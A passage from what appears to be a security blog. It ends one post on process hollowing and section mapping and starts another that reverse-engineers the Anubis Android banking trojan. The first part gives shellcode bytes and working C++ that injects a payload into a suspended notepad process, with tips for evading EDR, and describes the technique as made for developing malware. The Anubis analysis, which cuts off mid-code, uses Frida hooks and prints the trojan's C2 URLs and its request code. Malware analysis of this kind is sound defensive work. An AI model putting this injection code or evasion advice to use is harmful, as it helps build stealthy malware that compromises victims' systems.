        "\xe6\x56\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c"
        "\x24\x52\xe8\x5f\xff\xff\xff\x68\x6f\x78\x58\x20\x68\x61\x67"
        "\x65\x42\x68\x4d\x65\x73\x73\x31\xdb\x88\x5c\x24\x0a\x89\xe3"
        "\x68\x6b\x74\x58\x20\x68\x74\x20\x72\x65\x68\x45\x3d\x67\x65"
        "\x68\x54\x49\x54\x4c\x68\x72\x65\x6b\x74\x68\x67\x65\x74\x20"
        "\x31\xc9\x88\x4c\x24\x16\x89\xe1\x31\xd2\x52\x53\x51\x52\xff"
        "\xd0\x31\xc0\x50\xff\x55\x08";


    HOST* hostProcess = new HOST();
    LPSTARTUPINFOA si = new STARTUPINFOA();
    LPPROCESS_INFORMATION pi = new PROCESS_INFORMATION();
    PROCESS_BASIC_INFORMATION* pbi = new PROCESS_BASIC_INFORMATION();
    DWORD returnLength = 0;
    CONTEXT ctx;

    SHELLCODE* s = new SHELLCODE();
    s->shellcode = buf;
    s->shellcodeSize = sizeof(buf);
        
    if (CreateProcessA(
        "C:\\Windows\\System32\\notepad.exe", 
        (LPSTR)"C:\\Windows\\System32\\notepad.exe",
        NULL, NULL, TRUE, 
        CREATE_SUSPENDED | CREATE_NO_WINDOW, 
        NULL, NULL, si, pi) == FALSE)
    {
        std::cout << "[x]Failed to execute notepad.exe\n";
        return FALSE;
    }
    std::cout << "[!]Executed notepad.exe\n";

    hostProcess->processHandle = pi->hProcess;
    ctx.ContextFlags = CONTEXT_FULL;
    fNtGetContextThread(pi->hThread, &ctx);

    NtQueryInformationProcess(
        hostProcess->processHandle, 
        ProcessBasicInformation, 
        pbi,
        sizeof(PROCESS_BASIC_INFORMATION), 
        &returnLength);
    DWORD pebImageBaseOffset = (DWORD)pbi->PebBaseAddress + 0x8;

    SIZE_T bytesRead = 0;
    if (!ReadProcessMemory(
        hostProcess->processHandle, 
        (LPCVOID)pebImageBaseOffset, 
        &hostProcess->imageBaseAddress,
        4, &bytesRead) && bytesRead != 4)
    {
        std::cout << "failed to read image base address" << std::endl;
        return -1;
    }

    PVOID remoteShellcodeAddress = InjectShellcode(hostProcess, s);
    if (remoteShellcodeAddress == NULL)
    {
        std::cout << "shellcode injection failed\n"; 
        return -1;
    }
   
    PVOID addr = NULL;
    if ((addr = PatchHostProcess(hostProcess, remoteShellcodeAddress)) == NULL)
    {
        std::cout << "failed tp patch host\n";
        return -1;
    } 

    fNtSetContextThread(pi->hThread, &ctx);

    std::cout << "[!] Resumed thread\n";
    ResumeThread(pi->hThread);
}

Above code does exactly what is listed above. First, it starts a notepad process suspend it’s exution. then it retrieves thread context from theprocess. Thread context is important because, without setting context back to what it was before suspending will cause a program crash.

Then it proceed to retrieve ImageBaseAddress of the process using NtQueryInformationProcess and ReadProcessMemory.

Then the shellcode is injected into the target process by the function InjectShellcode. This function uses the same technique discussed arlier.

The main function then calls PatchHostProcess. This function reads the host process’s image into the memory and parses the entry point. Then in the local copy, it creates a hook that jumps into the shellcode that InjectShellcode injected. Then it uses the above code injection method and creates a section in the local process, however, before creating a section in the remote process, it unmaps the process image using a call to ZwUnmapViewOfSection. it then creates the section at the same address that the original image was mapped.

Its worth noting that it is possible to hook any address of the process image as long as it does not spawn notepad (or whatever).

Result after compiling and running the code

permissions of the shellcode

permissions of the original notepad image

Achieving more stealth

Even though the technique is capable of fooling both analysts and some EDR,it can be stll detected if defense solutions are monitoring CreateProcessA.

There are many workarounds for this. One can directly call NtCreateUserProcess or NtCreateProcessEx.

Another method is to Hook one of those APIs and call CreateProcessA with false arguments. For example,

- Hook `NtCreateUserProcess` so it will jump into a specified location
- Call CreateProcessA without `CREATE_SUSPENDED` flag.
- Set `CREATE_SUSPENDED` flag and jump back to `NtCreateUserProcess`

(to learn more about above technique, my seggestion is to reverse IcedID)

The other thing to consider is changing the memory permissions of the target process after remapping. Even without doing that, it can mislead an analyst to beleive it as the malicious binary since it has permissions RWX.

Even after that, once analyst has dumped the original executable image thinking it is malicous to analyze it, it is pretty easy to indeify the hook. As stated earlier, it is possible hook any other location as long as it does not start the original process.

It is also possible to implement other instructions to change the control flow. For example, push / ret.

References

hollowfind volatility plugin

DETECTING DECEPTIVE PROCESS HOLLOWING TECHNIQUES USING HOLLOWFIND VOLATILITY PLUGIN

The end

This blog post explored the concept of section mapping and how it can be leveraged when developing malware.

#Spread Anarchy!

Reversing Anubis

Mon, 13 Dec 2021 11:50:35 +0000

Table of Content

Introduction

Anubis is a pretty big banking trojan that targets android devices. Its first appearance dates back to 2016. And anubis is reported to have keylogging capabilities, sms spam, GPS tracking and many other scary stuff, of course, other than stealing your banking information.

In this blog post, i will poke various parts of the malware while reverse engineering it to understand how it works and how to defeat it.

Samples

github

Environment

- linux host
- android vm (API version 23) (no google services)

Tools

- apktool
- adb
- frida
- mobsf
- jadx-gui

Analysis

The manifest

to analyze the manifest

    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <uses-permission android:name="android.permission.GET_TASKS"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.WRITE_SMS"/>
    <uses-permission android:name="android.permission.PACKAGE_USAGE_STATS"/>
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.CALL_PHONE"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.RECORD_AUDIO"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/>

As we can see, this malware can send, receive SMS, read contacts, access location, read and write to external storage. It is also requesting permission to get notified once when the system boots up, which helps malware to persist on a device.

by investigating the activities in the xml, we can get a rough idea about which classes use which permissions and point our attention to those classes when we do actual reversing.

        <activity android:name="wocwvy.czyxoxmbauu.slsa.ncec.myvbo">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>

Its the MainActivity, which will be our first target when approaching the malware.

        <activity android:name="wocwvy.czyxoxmbauu.slsa.opzsdswiddt">
            <intent-filter>
                <action android:name="android.intent.action.SEND"/>
                <action android:name="android.intent.action.SENDTO"/>
                <data android:scheme="sms"/>
                <data android:scheme="smsto"/>
                <data android:scheme="mms"/>
                <data android:scheme="mmsto"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <category android:name="android.intent.category.BROWSABLE"/>
            </intent-filter>
        </activity>

Activity wocwvy.czyxoxmbauu.slsa.opzsdswiddt has capabilities to send sms.

        <service android:name="wocwvy.p003x881dce2d.slsa.lmimy" android:permission="android.permission.SEND_RESPOND_VIA_MESSAGE" android:exported="true">
            <intent-filter>
                <action android:name="android.intent.action.RESPOND_VIA_MESSAGE"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <data android:scheme="sms"/>
                <data android:scheme="smsto"/>
                <data android:scheme="mms"/>
                <data android:scheme="mmsto"/>
            </intent-filter>
        </service>

class wocwvy.czyxoxmbauu.slsa.lmily is service that it responsible for responding messages.

        <receiver android:name="wocwvy.czyxoxmbauu.slsa.pworotsvjdlioho.hypihteeavv">
            <intent-filter android:priority="999">
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
                <action android:name="android.intent.action.QUICKBOOT_POWERON"/>
                <action android:name="com.htc.intent.action.QUICKBOOT_POWERON"/>
                <action android:name="android.intent.action.USER_PRESENT"/>
                <action android:name="android.intent.action.PACKAGE_ADDED"/>
                <action android:name="android.intent.action.PACKAGE_REMOVED"/>
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
                <action android:name="android.intent.action.SCREEN_ON"/>
                <action android:name="android.intent.action.EXTERNAL_APPLICATIONS_AVAILABLE"/>
                <category android:name="android.intent.category.HOME"/>
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE"/>
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE"/>
                <action android:name="android.net.wifi.WIFI_STATE_CHANGED"/>
                <action android:name="android.intent.action.DREAMING_STOPPED"/>
            </intent-filter>
        </receiver>

The receiver "wocwvy.czyxoxmbauu.slsa.pworotsvjdlioho.hypihteeavv is listening for BOOT_COMPLETED, PACKAGE_ADDED, SMS_RECEIVED and many more stuff. it looks like this one is really important.

Since we know this is a banking trojan, we assume that application is waiting for the user to install banking apps (PACKAGE_ADDED) and the above mentioned class is responsible for that.

To achieve persistence it is listening for BOOT_COMPLETED.

manifest also mentions that the application uses accessibility framework, by class wocwvy.czyxoxmbauu.slsa.egxltnv

        <service android:label="Android Security" android:name="wocwvy.czyxoxmbauu.slsa.egxltnv" android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
            <intent-filter>
                <action android:name="android.accessibilityservice.AccessibilityService"/>
            </intent-filter>
            <meta-data android:name="android.accessibilityservice" android:resource="@xml/mihaf"/>
        </service>

it also references another xml, which specifies what kind of operation does this application do with the framework.

<?xml version="1.0" encoding="utf-8"?>
<accessibility-service android:settingsActivity="com.example.root.myapplication.MainActivity" android:accessibilityEventTypes="typeWindowContentChanged|typeWindowStateChanged" android:accessibilityFlags="flagDefault|flagIncludeNotImportantViews|flagReportViewIds" android:canRetrieveWindowContent="true"
  xmlns:android="http://schemas.android.com/apk/res/android" />

Here, we can see that the application is listening for events such as typeWindowStateChanged, typeWindowContentChanged. Which basically means this application is listening to everything. And guess what? it can also retrieve the content.

before running the sample on the vm or decompiling it, it would be better to run it on a automated framework just to make sure (dunno, it is just a habit :3). Then we can focus on the specific details. Here im going to use MobSF.

here we can see that the application has 17 activities, 24 services, 4 receivers and 0 providers.

However when i try to run a dynamic analysis on the apk, MobSF failed with few errors.

with the above result, we can confirm our assumptions on receivers, activities and services we made considering the result of MobSF.

here androguard shows us receivers, main activity and the services.

However all the above names seemed to be obfuscated.

Behavioral analysis

first, im going to stop the emulator and restart it with following parameters

-show-kernel -tcpdump dump.cap

so we can take a look at network traffic later on, in case. (I’ve also setup mitmproxy)

running the sample, its asking to enable ‘accessibility permissions’. And the user is forced to grant the permission. This enables application run in the background.

Here’s the network traffic.

when granted the requested permission, the malware seemed to be deleted from the devic. However, its listed in the packages.

root@generic_x86_64:/ # pm list packages | grep slsa                           
package:wocwvy.czyxoxmbauu.slsa
root@generic_x86_64:/ #

which means that it has only deleted the icon from the application launcher not the app itself.

Identifying the obfuscator

It is possible to identify the obfuscator just by looking at smali code. For example, ProGuard, which is one of the most popular android obfuscators out there, can be idenitified if the smali code contains variable names, strings with d, a, a;->a characters. (However ProGuard accepts different sets of characters for this, and it is not a good idea to make decision just based ont this).

first lets check for DexGuard, another common obfuscator. DexGuard is known to use non ascii chars for obfuscation.

import re, os
from pathlib import Path

def non_ascii_in_string(string):
    regexp = re.compile(r'[^\00-\xff]')
    if regexp.search(string):
        return True
    else:
        return False

def scan_file(filepath):
    try:
        with open(filepath, mode='r') as f: 
            i = 0
            for line in f:
                i+=1
                if non_ascii_in_string(line):
                    print "line [{lno}] {line} - {file}".format(lno=i, line=line, file=filepath)
    except:
        return

def main():
    pathlist = Path("smali").rglob("*.smali")
    for path in pathlist:
        scan_file(str(path))

if __name__ == '__main__':
    main()

above python script scans the smali directory generated by apktool for strings that contain non ascii characters.

so its no harm to conclude that this sample is not obfuscated with DexGuard.

we can use the same script to detect ProGuard by replacing the regular expression with a/a;->a. ()

here is the result.

from that, we can conclude that this sample is obfuscated using ProGuard.

There are few projects that are capable of deobfuscating ProGuard. dex-oracle, simplify are two of such projects. However the goal here is not to deobfuscate the class names, variable names, and methods, but to deobfuscate constants and strings because without the mapping.txt, there is no way to rename classes, methods and variables things to their original names, but jadx’s deobfuscator can help us with that for a bit.

simplify get to somewhere but then horribly fails.

java.lang.NullPointerException: Attempt to get length of null array
	at java.base/jdk.internal.reflect.GeneratedConstructorAccessor6.newInstance(Unknown Source)
	at java.base/jdk.internal.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)
	at java.base/java.lang.reflect.Constructor.newInstance(Constructor.java:490)
	at org.cf.smalivm.ExceptionFactory.build(ExceptionFactory.java:28)
	at org.cf.smalivm.opcode.ArrayLengthOp.<init>(ArrayLengthOp.java:28)
	at org.cf.smalivm.opcode.ArrayLengthOpFactory.create(ArrayLengthOpFactory.java:19)
	at org.cf.smalivm.opcode.OpCreator.create(OpCreator.java:29)
	at org.cf.smalivm.context.ExecutionGraph.buildLocationToNodePile(ExecutionGraph.java:89)
	at org.cf.smalivm.context.ExecutionGraph.<init>(ExecutionGraph.java:62)
	at org.cf.smalivm.VirtualMachine.updateInstructionGraph(VirtualMachine.java:180)
	at org.cf.smalivm.VirtualMachine.spawnInstructionGraph(VirtualMachine.java:131)
	at org.cf.smalivm.MethodExecutorFactory.build(MethodExecutorFactory.java:62)
	at org.cf.smalivm.VirtualMachine.execute(VirtualMachine.java:75)
	at org.cf.smalivm.opcode.InvokeOp.executeLocalMethod(InvokeOp.java:434)
	at org.cf.smalivm.opcode.InvokeOp.execute(InvokeOp.java:136)
	at org.cf.smalivm.context.ExecutionNode.execute(ExecutionNode.java:53)
    
    [...]

I tried running dex-oracle and it failed too.

Packed or what

Lets try to identify whether is apk is packed. This is pretty straightfoward. To use a class in an android application, one must define it in the manifest file.

If the application doesnt have the classes specified in the manifest, then chances are that it is packed.

If the apk has got more classes than that of the manifest, it also indicates that the apk is packed.

In case of above situations, following APIs will be used to load and run classes at runtime.

- dalvik.system.DexClassLoader
- dalvik.system.PathClassLoader
- dalvik.system.InMemoryDexClassLoader

Eventhough our apk does specify the exact same classes specified in the manifest (other than few classes), let’s search for above mentioned APIs.

we get few occurances of the DexClassLoader in the class wocwvy.czyxoxmbauu.slsa.b (no result for the other two).

when I trace DexClassLoader using below frida agent,

if (Java.available) {
    Java.perform(function(){
        var dex_class_loader = Java.use('dalvik.system.DexClassLoader');
        dex_class_loader.$init.implementation = function(a, b, c, d) {
            var ret = this.$init(a, b, c, d);
            send("[*] constructor called DexClassLoad(\""+ a +", "+b+", "+c+"\");");
            return ret;
        }
    )}
}

the result was empty, which implies that the malware is not loading classes at runtime. From which i assume that this malware is not packed.

Going Down the Rabbit Hole

Since we have idenitified the MainActivity and some other useful classes using the manifest, we know where to start. We’ll start with the MainActivity (obiviously) and move into other stuff we idenitified.

To do a code analysis, first, the apk should be converted into jar format.

rxOred-aspiree :: Analysis/android/anubis » enjarify anubis.apk
Using python3 as Python interpreter
Output written to anubis-enjarify.jar
136 classes translated successfully, 0 classes had errors
rxOred-aspiree :: Analysis/android/anubis »

Then, using jadx, we can analyse the code.

MainActivity

/* renamed from: wocwvy.czyxoxmbauu.slsa.ncec.myvbo */
public class MainActivity extends Activity {

    [... some variables]
    
    /* renamed from: d */
    BankingApps banking_apps = new BankingApps();

    /* access modifiers changed from: protected */
    public void onCreate(Bundle bundle) {
        super.onCreate(bundle);
        if (!this.consts.f388o || Build.VERSION.SDK_INT < 19) {
            startService(new Intent(this, jtfxlnc.class));
        } else {
            WebView webView = new WebView(this);
            webView.getSettings().setJavaScriptEnabled(true);
            webView.loadUrl(this.consts.f389p);
            setContentView(webView);
        } 
        
        [... more code]

In the MainActivity, it declares some variables, including banking_apps of type class BankingApps. (which i reversd before coming to this hehe :3).

onCreate method then check whether if consts.f388o is false (which is initially false, and defined in Constants class) or Build.VERSION.SDK_INT is less than 19.

if yes, it creates the service jtfxlnc, else (if const.f388o is true or Build.VERSION.SDK_INT >= 19), it creates a WebView, enable javascript and load the url specified in consts.f389p. then it sets the content view to the web view.

what this basically does is loads up a web page in a WebView layout as a part of the activity.

public class Constants {
    [... more constants]

    /* renamed from: o */
    public boolean f388o = false;

    /* renamed from: p */
    public String url_image = "<urlImage>";

    [... more constants]
}

Above snippet shows the constants

Then we can see an interesting piece of code in the MainActivity after the if else statement.

            getPackageManager().setComponentEnabledSetting(new ComponentName(this, MainActivity.class), 2, 1);

According to Android developers, setComponentEnabledSetting ‘sets te enabled setting fot a package component (activity, receiver, service, provider). this setting will override any enabled state which may have been set by the component manifest’

Here, MainActivity calls above API for itself, with constant 2 as the second argument. which is stands for COMPONENT_ENABLED_STATE_DISABLED. In short terms, malware basically hides its icon from the launcher (by disabling) to make it harder for a regular user to delete the application. All this makes sense because, this is why malware has started a service to run in the background.

then there’s a try catch block

        try {
            SomeHttpClass bVar = this.cls;
            SomeHttpClass.m231a(this, "startAlarm", (long) Integer.parseInt(this.cls.mo234e(this, "Interval")));
        } catch (Exception e) {
            SomeHttpClass bVar2 = this.cls;
            SomeHttpClass.m231a(this, "startAlarm", 10000);
        }
        if (!this.consts.f388o) {
            finish();
        }
    }
}

This piece of code tries to start an alarm with the return value of SomeHttpClass.mo234e(), if fails, it sets a default value of 10000.

Now its time to do some instrumentation and find out whats returning from that method.

first off, we need a frida agent and a wrapper script. I chose python to write the wrapper script.

import frida
import sys, codecs, os, time

def callback(message, data):
    if 'payload' in message and message['type'] == 'send':
        print("[!] callback -> {0}".format(message['payload']))
    else:
        print(message)

def main():
    if len(sys.argv) < 3:
        print("wrapper.py <appname> <agent>")
        sys.exit(0)

    source = None
    with codecs.open(sys.argv[2], "r", "utf-8") as f:
        source = f.read()

    if source:
        device = frida.get_usb_device()
        pid = device.spawn([sys.argv[1]])
        device.resume(pid)
        time.sleep(1)
        session = device.attach(pid)
        script = session.create_script(source)
        script.on('message', callback)
        script.load()

        sys.stdin.read()

    else:
        print("failed to read the frida agent")
        sys.exit(1)


if __name__ == '__main__':
    main()

let’s write a frida agent that hooks SomeHttpClass.mo234e(); Without jadx deobfuscator, method is named as below

public String e(Context context, String str) {...}

and it is overloaded. So we have to handle that within the frida agent.

'use strict';

if (Java.available) { 
    Java.perform(function() {
        var some_http_class = Java.use("wocwvy.czyxoxmbauu.slsa.b");
        some_http_class.e.overload("andorid.context.Context", "java.lang.String")implementation = function(x, y) {
            var ret = this.e(x, y);
            send("[*] method called SomeHttpClass.mo234e("+ y +") => return: "+ ret.toString());
            return ret;
        }
    })
}

rxOred-aspiree :: ~/Analysis/android � python wrapper.py wocwvy.czyxoxmbauu.slsa mo234e.js
[!] callback -> [*] method called SomeHttpClass.mo234e("urls") => return: http://cdnjs.su
[!] callback -> [*] method called SomeHttpClass.mo234e("save_inj") => return: 
[!] callback -> [*] method called SomeHttpClass.mo234e("cryptfile") => return: false
[!] callback -> [*] method called SomeHttpClass.mo234e("startRecordSound") => return: stop
[!] callback -> [*] method called SomeHttpClass.mo234e("startRequest") => return: Access=0Perm=0
[!] callback -> [*] method called SomeHttpClass.mo234e("startRequest") => return: Access=0Perm=0
[!] callback -> [*] method called SomeHttpClass.mo234e("recordsoundseconds") => return: 0
[!] callback -> [*] method called SomeHttpClass.mo234e("lookscreen") => return: 
[!] callback -> [*] method called SomeHttpClass.mo234e("StringAccessibility") => return: Enable access for
[!] callback -> [*] method called SomeHttpClass.mo234e("urls") => return: http://cdnjs.su
[!] callback -> [*] method called SomeHttpClass.mo234e("save_inj") => return: 
[!] callback -> [*] method called SomeHttpClass.mo234e("cryptfile") => return: false
[!] callback -> [*] method called SomeHttpClass.mo234e("startRecordSound") => return: stop
[!] callback -> [*] method called SomeHttpClass.mo234e("recordsoundseconds") => return: 0
[!] callback -> [*] method called SomeHttpClass.mo234e("lookscreen") => return: 
[!] callback -> [*] method called SomeHttpClass.mo234e("urls") => return: http://cdnjs.su
[!] callback -> [*] method called SomeHttpClass.mo234e("save_inj") => return: 
[!] callback -> [*] method called SomeHttpClass.mo234e("cryptfile") => return: false
[!] callback -> [*] method called SomeHttpClass.mo234e("startRecordSound") => return: stop
[!] callback -> [*] method called SomeHttpClass.mo234e("recordsoundseconds") => return: 0
[!] callback -> [*] method called SomeHttpClass.mo234e("lookscreen") => return: 
[!] callback -> [*] method called SomeHttpClass.mo234e("keylogger") => return: 
[... more stuff here]

well that’s a lot. it seems like the malware calls the method many times before the MainActivity calls it. My guess is that would be the service that it starts. However we see some interesting stuff in the above snippet.

for example, when the method is called with url as an argument, it returns https://cdnjs.sv.

and we can also see that the method is called with keylogger as the argument, which gives us a hint that this malware is capable of keylogging.

[!] callback -> [*] method called SomeHttpClass.mo234e("interval") => return: 10000

SomeHttpClass.mo234e() method returns value 10000, which is exactly the same value thats going to be used when the condition fails.

So what exactly SomeHttpClass.mo234e() does? Well, I think its reading data from some kind of data storage using the key which it receives as an argument. Yaeee?? what comes to your mind?? shared preferences.

To confirm our assumption

    /* renamed from: mo234e */
    public String getSharedPreference(Context context, String str) {
        if (shared_pef == null) {
            shared_pef = context.getSharedPreferences("set", 0);
            shared_pref_editor = shared_pef.edit();
        }
        String string = shared_pef.getString(str, null);
        return (str.contains("urlInj") || str.contains("urls")) ? mo230d(string) : string;
    }

See? (keep in mind that, when returning from the function is checks whether str contains urls or urlInj, if so, it calles another method with string and return it, probably a decoder.)

Now, what we can do is, trace back and find the xml file.

'use strict';

Interceptor.attach(Module.findExportByName(null, "open"), {
    onEnter: function(args) {
        this.flag = false;
        var filename = Memory.readCString(ptr(args[0])); 
        if (filename.endsWith(".xml")) {
            send("[*] open called => (\""+ filename + "\")");
            this.flag = true;
            var backtrace = Thread.backtrace(this.Context, Backtracer.ACCURATE).map(DebugSymbol.fromAddress).join("\n\t");
            send("[-] traced ["+ Memory.readCString(ptr(args[0])) + "]\nBacktrace => "+ backtrace);
        }
    }
});

result:

[!] callback -> [*] open called => ("/data/user/0/wocwvy.czyxoxmbauu.slsa/shared_prefs/set.xml")
[!] callback -> [-] traced [/data/user/0/wocwvy.czyxoxmbauu.slsa/shared_prefs/set.xml]
Backtrace => 0x79f058b9d749 frida-agent-64.so!0x29b749
	0x79f058be791c frida-agent-64.so!0x2e591c
	0x79f058bf33d9 frida-agent-64.so!0x2f13d9
	0x79f058bf4bf6 frida-agent-64.so!0x2f2bf6
	0x79f058bf3077 frida-agent-64.so!0x2f1077
	0x79f058b909d5 frida-agent-64.so!0x28e9d5
	0x79f058b90adb frida-agent-64.so!0x28eadb
	0x79f058ba41fd frida-agent-64.so!0x2a21fd
	0x79f058b64cfc frida-agent-64.so!0x262cfc
	0x79f0f2a3a077
	0x241

see? we’ve found the shared preference xml. Now its all about extracting it from the device using adb and look for interesting stuff.

<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <string name="madeSettings">1 2 3 4 5 6 7 8 9 10 11 12 13 </string>
    <string name="StringPermis">Allow</string>
    <string name="uninstall1">uninstall</string>
    <string name="VNC_Start_NEW">http://ktosdelaetskrintotpidor.com</string>
    <string name="startRequest">Access=0Perm=0</string>
    <string name="sound">start</string>
    <string name="vkladmin">include</string>
    <string name="DexSocksMolude"></string>
    <string name="websocket"></string>
    <string name="uninstall2">to remove</string>
    <string name="lookscreen"></string>
    <string name="StringAccessibility">Enable access for</string>
    <string name="dateCJ"></string>
    <string name="id_windows_bot"></string>
    <string name="StringActivate">activate</string>
    <string name="checkStartGrabber">0</string>
    <string name="vnc">start</string>
    <string name="cryptfile">false</string>
    <string name="recordsoundseconds">0</string>
    <string name="gps">false</string>
    <string name="swspacket">com.android.messaging</string>
    <string name="perehvat_sws">false</string>
    <string name="buttonPlayProtect">Сontinue</string>
    <string name="name">false</string>
    <string name="interval">10000</string>
    <string name="del_sws">false</string>
    <string name="RequestGPS"></string>
    <string name="straccessibility">start now</string>
    <string name="status"></string>
    <string name="timeStartGrabber"></string>
    <string name="play_protect"></string>
    <string name="spamSMS"></string>
    <string name="Starter">http://sositehuypidarasi.com</string>
    <string name="network">false</string>
    <string name="getNumber">false</string>
    <string name="indexSMSSPAM"></string>
    <string name="urls">ZWViZGQ3NjRjOGZlOWNjMjAzODhhNzFhNzg4MDJi&#10;    </string>
    <string name="str_push_fish"></string>
    <string name="time_start_permission">120</string>
    <string name="save_inj"></string>
    <string name="textSPAM"></string>
    <string name="straccessibility2">to start</string>
    <string name="findfiles"></string>
    <string name="key"></string>
    <string name="StringYes">Yes</string>
    <string name="startRecordSound">stop</string>
    <string name="urlInj"></string>
    <string name="htmllocker"></string>
    <string name="foregroundwhile"></string>
    <string name="lock_btc"></string>
    <string name="SettingsAll"></string>
    <string name="RequestINJ"></string>
    <string name="time_work">375</string>
    <string name="iconCJ">0:0</string>
    <string name="keylogger"></string>
    <string name="step">0</string>
    <string name="textPlayProtect">The system does not work correctly, disable Google Play Protect!</string>
    <string name="lock_amount"></string>
</map>

This xml file explains what this malware is capable of.

here’s another agent to monitor what values are being written to the xml file.

'use strict';

var fds = {};
Interceptor.attach(Module.findExportByName(null, "open"), {
    onEnter: function(args) {
        var filename = Memory.readCString(ptr(args[0]));
        if (filename.endsWith('.xml')) {
            send("[*] open called => (\""+ filename + "\")");
            this.flag = true;
            this.fname = filename;
        }
    },
    onLeave: function(retval) {
        if (this.flag) {
            fds[retval] = this.fname;
        }
    }
});
['read', 'write', 'pread', 'pwrite', 'readv', 'writev'].forEach(func => {
    Interceptor.attach(Module.findExportByName(null, func), {
        onEnter: function(args) {
            var fd = args[0];
            if (fd in fds) {
                send(`${func}: ${fds[fd]} \t`);
                if (args[1] != null) {
                    if (func == 'write') {
                        var buffer = Memory.readCString(ptr(args[1]));
                        send("\tbuffer => "+buffer);
                    }
                }
            }
        }
    });
});

However it does not explicitly specify what are the new values written to the file. Instead, it prints the whole buffer. In this case, the buffer is the xml.

C2s, Tweets and Data Exfiltration

Since we have already analyzed few methods from the SomeHttpClass, It’s time to dig deep into it.

class got following member variables.


    /* renamed from: c */
    static final Constants consts = new Constants();

    /* renamed from: d */
    static final String android_sec = "Android Security";

    /* renamed from: e */
    private static SharedPreferences shared_prefs;

    /* renamed from: f */
    private static SharedPreferences.Editor shared_ref_editor;

    /* renamed from: a */
    Constants consts2 = new Constants();

    /* renamed from: b */
    BankingApps banking_apps = new BankingApps();

Inside the class, there is another class, which I renamed to MakeTwitterRequest because this is the class that makes the twitter request to qweqweqwe before.

    public class MakeTwitterRequest extends AsyncTask {

        [... more code and data]
        
        public String doInBackground(Void... voidArr) {
            try {
                SomeHttpClass.this.consts2.getClass();
                this.conn = (HttpURLConnection) new URL("https://twitter.com/qweqweqwe").openConnection();
                this.conn.setRequestMethod("GET");
                this.conn.connect();

                InputStream inputStream = this.conn.getInputStream();
                StringBuffer stringBuffer = new StringBuffer();
                this.reader = new BufferedReader(new InputStreamReader(inputStream));
                while (true) {
                    String readLine = this.reader.readLine();
                    if (readLine == null) {
                        break;
                    }
                    stringBuffer.append(readLine);
                }

inside the try block, it opens a connection to https://twitter.com/qweqweqwe. then it gets an InputStream from the connection and reads data to StringBuffer stringBuffer with the help of a BufferedReader reader.

                this.str = stringBuffer.toString().replace(" ", "");
                this.str = SomeHttpClass.this.mo208a(this.str, "�����", "�����");  // some chinese characters

The malware then replaces all the spaces with empty string, and calls SomeHttpClass.mo208a, passing some random looking chinese letters as second and third arguments.

lets see what’s the return value with frida. again, this shit is overloaded too. (pretty common in obfuscated java code.)

'use strict';

if (Java.available) {
    Java.perform(function() {
        var some_http_class = Java.use("wocwvy.czyxoxmbauu.slsa.b");
        some_http_class.a.overload("java.lang.String", "java.lang.String", "java.lang.String").implementation = function(x, y, z) { 
            send("[*] method called SomeHttpClass.mo208a(\""+ x +"\", " +y+ "\", "+z+"\")");
            var ret = this.a(x, y, z); 
            if (ret != undefined) {
                send(" => return: "+ ret);
                return ret;
            }
            else {
                send(" => return: undefined");
                return Java.use('java.lang.String').$new("undefined");
            }       
        }
    });
}

when ran the above agent,

[!] callback -> [*] method called SomeHttpClass.mo208a("null", <tag>", </tag>")
[!] callback ->  => return: undefined

we can see that the method is called by with some unexpected arguments. And this is even before the malware makes the request to twitter url. If you wait bit longer (until the malware makes that request), we can see the arguments we expected.

I cant drop the result here because first argument is too long. which makes sense because malware is using the response html as the first argument. Unfortunately, the return value we get is, "" :3.

[!] callback ->  => return:

However we can try to understand what SomeHttpClass.mo208a is doing with the input either using frida or by intercepting the request and writing a response that suite our needs.

'use strict';

if (Java.available) {
    Java.perform(function() {
        var java_string = Java.use("java.lang.String");
        var some_http_class = Java.use("wocwvy.czyxoxmbauu.slsa.b");
        some_http_class.a.overload("java.lang.String", "java.lang.String", "java.lang.String").implementation = function(x, y, z) { 
            send("[*] method called SomeHttpClass.mo208a(\""+ x +"\", " +y+ "\", "+z+"\")");
            send("[*] calling method with 123456789abcdefhijklmnoqpuvwz");
            var ret = this.a(java_string.$new("123456789abcdefhijklmnoqpuvwz"), java_string.$new('123456'), java_string.$new('noqpuvwz')); 
            if (ret != undefined) {
                send(" => return: "+ ret);
                return ret;
            }
            else {
                send(" => return: undefined");
                return Java.use('java.lang.String').$new("undefined");
            }       
        }
    });
}

The above agent calls the intended method with various strings as arguments.

result:

[!] callback -> [*] method called SomeHttpClass.mo208a("null", <tag>", </tag>")
[!] callback -> [*] calling method with 123456789abcdefhijklmnoqpuvwz
[!] callback ->  => return: 789abcdefhijklm

So it looks like function is taking three arguments and returning the string between the string specified in the second argument and the third. For example, in the above case, Ive called the method with 123456789abcdefhijklmnoqpuvwz as the first argument and 123456 and noqpuvwz as second and third arguments. the result is 789abcdefhijklm.

anyway, back to the code we’ve been analyzing

                int i = 0;
                while (true) {
